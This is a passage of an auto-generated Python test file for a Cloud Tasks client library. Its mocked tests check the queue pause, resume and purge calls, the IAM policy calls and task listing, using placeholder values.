# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.purge_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_purge_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_queue(
cloudtasks.PurgeQueueRequest(), name="name_value",
)
def test_pause_queue(
transport: str = "grpc", request_type=cloudtasks.PauseQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PauseQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_pause_queue_from_dict():
test_pause_queue(request_type=dict)
@pytest.mark.asyncio
async def test_pause_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.PauseQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.pause_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
)
)
response = await client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_pause_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PauseQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.pause_queue), "__call__") as call:
call.return_value = queue.Queue()
client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_pause_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PauseQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.pause_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_pause_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
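# The client is expected to pack these keyword arguments into the
# request object.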
client.pause_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_pause_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.pause_queue(
cloudtasks.PauseQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_pause_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.pause_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.pause_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_pause_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.pause_queue(
cloudtasks.PauseQueueRequest(), name="name_value",
)
def test_resume_queue(
transport: str = "grpc", request_type=cloudtasks.ResumeQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ResumeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_resume_queue_from_dict():
test_resume_queue(request_type=dict)
@pytest.mark.asyncio
async def test_resume_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.ResumeQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.resume_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
)
)
response = await client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_resume_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ResumeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.resume_queue), "__call__") as call:
call.return_value = queue.Queue()
client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_resume_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ResumeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.resume_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_resume_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.resume_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_resume_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.resume_queue(
cloudtasks.ResumeQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_resume_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.resume_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.resume_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_resume_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.resume_queue(
cloudtasks.ResumeQueueRequest(), name="name_value",
)
def test_get_iam_policy(
transport: str = "grpc", request_type=iam_policy.GetIamPolicyRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy(version=774, etag=b"etag_blob",)
response = client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy.GetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_get_iam_policy_from_dict():
test_get_iam_policy(request_type=dict)
@pytest.mark.asyncio
async def test_get_iam_policy_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy.GetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_iam_policy), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy.Policy(version=774, etag=b"etag_blob",)
)
response = await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_get_iam_policy_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_iam_policy), "__call__") as call:
call.return_value = policy.Policy()
client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_iam_policy_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_iam_policy), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy.Policy())
await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_get_iam_policy_from_dict_foreign():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
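# The request may be passed as a plain dict; the client coerces it
# to a GetIamPolicyRequest.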
response = client.get_iam_policy(
request={
"resource": "resource_value",
"options": options.GetPolicyOptions(requested_policy_version=2598),
}
)
call.assert_called()
def test_get_iam_policy_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
def test_get_iam_policy_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_iam_policy(
iam_policy.GetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.asyncio
async def test_get_iam_policy_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_iam_policy), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy.Policy())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
@pytest.mark.asyncio
async def test_get_iam_policy_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_iam_policy(
iam_policy.GetIamPolicyRequest(), resource="resource_value",
)
def test_set_iam_policy(
transport: str = "grpc", request_type=iam_policy.SetIamPolicyRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy(version=774, etag=b"etag_blob",)
response = client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy.SetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_set_iam_policy_from_dict():
test_set_iam_policy(request_type=dict)
@pytest.mark.asyncio
async def test_set_iam_policy_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy.SetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.set_iam_policy), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy.Policy(version=774, etag=b"etag_blob",)
)
response = await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_set_iam_policy_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.set_iam_policy), "__call__") as call:
call.return_value = policy.Policy()
client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_set_iam_policy_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.set_iam_policy), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy.Policy())
await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_set_iam_policy_from_dict_foreign():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
response = client.set_iam_policy(
request={
"resource": "resource_value",
"policy": policy.Policy(version=774),
}
)
call.assert_called()
def test_set_iam_policy_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.set_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
def test_set_iam_policy_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_iam_policy(
iam_policy.SetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.asyncio
async def test_set_iam_policy_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.set_iam_policy), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy.Policy())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.set_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
@pytest.mark.asyncio
async def test_set_iam_policy_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.set_iam_policy(
iam_policy.SetIamPolicyRequest(), resource="resource_value",
)
def test_test_iam_permissions(
transport: str = "grpc", request_type=iam_policy.TestIamPermissionsRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
response = client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy.TestIamPermissionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_from_dict():
test_test_iam_permissions(request_type=dict)
@pytest.mark.asyncio
async def test_test_iam_permissions_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy.TestIamPermissionsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy.TestIamPermissionsResponse(permissions=["permissions_value"],)
)
response = await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.test_iam_permissions), "__call__"
) as call:
call.return_value = iam_policy.TestIamPermissionsResponse()
client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_test_iam_permissions_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.test_iam_permissions), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy.TestIamPermissionsResponse()
)
await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_test_iam_permissions_from_dict_foreign():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy.TestIamPermissionsResponse()
response = client.test_iam_permissions(
request={
"resource": "resource_value",
"permissions": ["permissions_value"],
}
)
call.assert_called()
def test_test_iam_permissions_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy.TestIamPermissionsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.test_iam_permissions(
resource="resource_value", permissions=["permissions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
assert args[0].permissions == ["permissions_value"]
def test_test_iam_permissions_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.test_iam_permissions(
iam_policy.TestIamPermissionsRequest(),
resource="resource_value",
permissions=["permissions_value"],
)
@pytest.mark.asyncio
async def test_test_iam_permissions_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy.TestIamPermissionsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.test_iam_permissions(
resource="resource_value", permissions=["permissions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
assert args[0].permissions == ["permissions_value"]
@pytest.mark.asyncio
async def test_test_iam_permissions_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.test_iam_permissions(
iam_policy.TestIamPermissionsRequest(),
resource="resource_value",
permissions=["permissions_value"],
)
def test_list_tasks(transport: str = "grpc", request_type=cloudtasks.ListTasksRequest):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse(
next_page_token="next_page_token_value",
)
response = client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListTasksRequest()
# Establish that the response is the type that we expect.
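# list_tasks returns a pager that wraps the response and proxies its
# fields (e.g. next_page_token).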
assert isinstance(response, pagers.ListTasksPager)
assert response.next_page_token == "next_page_token_value"
def test_list_tasks_from_dict():
test_list_tasks(request_type=dict)
@pytest.mark.asyncio
async def test_list_tasks_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.ListTasksRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse(next_page_token="next_page_token_value",)
)
response = await client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListTasksAsyncPager)
assert response.next_page_token == "next_page_token_value"
def test_list_tasks_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
call.return_value = cloudtasks.ListTasksResponse()
client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_tasks_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListTasksRequest()
request.parent = "parent/value"
